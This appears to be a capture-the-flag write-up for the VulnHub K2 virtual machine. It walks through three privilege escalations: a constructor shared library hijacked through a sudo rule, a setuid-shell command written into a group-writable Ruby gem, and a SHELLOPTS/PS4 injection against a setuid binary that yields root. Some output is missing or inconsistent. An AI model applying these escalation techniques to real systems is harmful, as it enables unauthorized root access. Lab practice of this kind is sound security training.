K2 VM (VULNHUB)

VM LINK : https://download.vulnhub.com/devrandom/K2.ova

root@kali:~# netdiscover -i eth0

Currently scanning: 192.168.69.0/16 | Screen View: Unique Hosts

15 Captured ARP Req/Rep packets, from 5 hosts. Total size: 900
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.23.2 00:50:56:f6:84:83 2 120 VMware, Inc.
192.168.23.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.23.140 00:0c:29:7e:f6:12 10 600 VMware, Inc.
192.168.23.142 00:0c:29:85:81:b4 1 60 VMware, Inc.
192.168.23.254 00:50:56:fb:32:c4 1 60 VMware, Inc.

root@kali:~# ssh user@192.168.23.142
The authenticity of host '192.168.23.142 (192.168.23.142)' can't be established.
ECDSA key fingerprint is SHA256:Vkq0eoP2Xwd9t69tf5fQkO4l+df05Ff4AXu61O8Avfs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.23.142' (ECDSA) to the list of known hosts.
user@192.168.23.142's password: password
Last failed login: Sun Jun 25 02:30:44 EDT 2017 from 10.1.0.16 on ssh:notty
There were 2 failed login attempts since the last successful login.
[user@localhost ~]$

[user@localhost ~]$ sudo -l
[sudo] password for user:
Matching Defaults entries for user on this host:
!visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME
LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User user may run the following commands on this host:
(user2) /bin/calc
[user@localhost ~]$

[user@localhost ~]$ ls -al /home/
total 0
drwxr-xr-x. 4 root root 31 Aug 30 2017 .
dr-xr-xr-x. 17 root root 224 Aug 30 2017 ..
drwx------. 2 user user 83 Aug 30 2017 user
drwx------. 2 user2 user2 83 Aug 30 2017 user2

[user@localhost ~]$ chmod +rx /home/user
[user@localhost ~]$ mkdir /home/user/.config
[user@localhost ~]$ cd /home/user/.config/

[user@localhost .config]$ vi libcalc.c

[user@localhost .config]$ cat libcalc.c
#include
#include

/* Marked as a constructor so it runs automatically when the shared
 * object is mapped, before the host program's main() gets control. */
static void x() __attribute__((constructor));

/* Copies bash to /tmp, sets the setuid/setgid bits on the copy and starts
 * it with -p (bash keeps its effective uid instead of dropping it).  All
 * of this runs with the privileges of whichever process loaded the
 * library.
 * NOTE(review): the session shows /bin/calc, run through the sudo rule
 * "(user2) /bin/calc", picking this file up from /home/user/.config; how
 * /bin/calc resolves libcalc.so is not visible here — confirm its library
 * search path.  Defensive takeaway: a sudo rule scoped to one binary is
 * only as tight as that binary's library loading, so a privileged program
 * must never load libraries from a directory the invoking user can write.
 * The typographic quotes around the command string are a page-extraction
 * artefact; a compiler would reject them as written. */
void x() {
system(“cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p”);
}

[user@localhost .config]$ gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
[user@localhost .config]$ sudo -u user2 /bin/calc
[sudo] password for user:
Calculating something, please wait…

[user2@localhost .config]$ cat /sbin/bckup
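#!/usr/bin/env ruby
# Backs up /etc/firewalld/ into a zip archive at a fixed path under /tmp.
# Every path below the directory (files and subdirectories, recursively)
# is added with the directory prefix stripped, so the archive root
# corresponds to /etc/firewalld/ itself.
#
# NOTE(review): the resulting /tmp/firewalld-backup.zip is owned by user3
# in the ls output of the session, which suggests this runs as user3 on a
# schedule — confirm against cron / systemd timers.
# NOTE(review): a fixed, predictable name in world-writable /tmp that is
# unlinked and re-created by a more privileged account is a symlink /
# pre-creation race; writing into a private directory (or Dir.mktmpdir)
# avoids it.  The path is kept here because callers may rely on it.
# NOTE(review): `require 'zip'` is resolved through the gem path; in the
# session the gem's lib/zip.rb is group-writable by user2, so anyone in
# that group runs code with this script's privileges.  Gem directories
# must be writable by root only.

require 'rubygems'
require 'zip'

directory = '/etc/firewalld/'
zipfile_name = '/tmp/firewalld-backup.zip'

# File.exist? rather than File.exists? — the latter was removed in Ruby 3.2.
File.delete(zipfile_name) if File.exist?(zipfile_name)
Zip::File.open(zipfile_name, Zip::File::CREATE) do |zipfile|
  Dir[File.join(directory, '**', '**')].each do |file|
    # Drop the leading directory so entries are relative inside the archive.
    zipfile.add(file.sub(directory, ''), file)
  end
end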

[user2@localhost .config]$ gem which zip
/usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
[user2@localhost .config]$ ls -la /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
-rw-rw-r--. 1 root user2 1621 Aug 30 2017 /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb

[user2@localhost .config]$ echo ‘`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`’ > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb

[user2@localhost tmp]$ cd /tmp/

[user2@localhost tmp]$ ls -al
total 1884
drwxrwxrwt. 7 root root 146 Sep 15 09:27 .
dr-xr-xr-x. 17 root root 224 Aug 30 2017 ..
-rwsr-sr-x. 1 user2 user2 960472 Sep 15 09:24 bash
-rwsr-sr-x. 1 user2 user2 960472 Sep 15 09:27 bash2
-rw-r--r--. 1 user3 user3 22 Sep 15 09:27 firewalld-backup.zip
drwxrwxrwt. 2 root root 6 Aug 30 2017 .font-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .ICE-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .Test-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .X11-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .XIM-unix

[user2@localhost tmp]$ ./bash2

bash2-4.2$

[user2@localhost tmp]$ id

bash2-4.2$ id
uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

bash2-4.2$ cd /tmp
bash2-4.2$ cat bash3.c
/* Swaps the real and effective uid/gid, then starts a fresh bash.
 * Why: when ./bash2 was run above without -p, the session reported
 * uid=1000(user) — bash presumably dropped the effective id back to the
 * real one because the two differed.  After the swap the real id is the
 * privileged one, so the child bash has nothing to drop and the next id
 * shows uid=1001(user2).
 * NOTE(review): as printed, unistd.h/stdlib.h are not included, main()
 * returns nothing and the quotes are typographic — likely page-extraction
 * artefacts rather than the file as it was compiled.
 * Defensive takeaway: setuid copies of shells in world-writable /tmp are
 * exactly what the `find / -perm -4000` run a few lines below is meant to
 * surface; mounting /tmp with nosuid makes both ./bash2 and this wrapper
 * ineffective. */
int main()
{ setreuid(geteuid(),getuid());
setregid(getegid(),getgid());
system(“/bin/bash”);
}

bash2-4.2$ gcc bash3.c -o bash3
bash2-4.2$ ./bash3

bash2-4.2$ id
uid=1001(user2) gid=1001(user2) groups=1001(user2) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

bash2-4.2$ find / -perm -4000 2>/dev/null
/tmp/bash
/tmp/bash2
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib64/dbus-1/dbus-daemon-launch-helper
/usr/local/bin/whoisme

bash2-4.2$ ls -al /usr/local/bin/whoisme
-rwsr-xr--. 1 root user3 8616 Aug 30 2017 /usr/local/bin/whoisme

bash2-4.2$ env -i SHELLOPTS=xstrace PS4=’$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)’ /bin/sh -c ‘/usr/local/bin/whoisme’

bash2-4.2$ ls -al

bash2-4.2$ ./bash4 -p

bash2-4.2# id

bash2-4.2# cd /root/

bash2-4.2# ls -al

bash2-4.2# cat flag.txt

@SAKSHAM DIXIT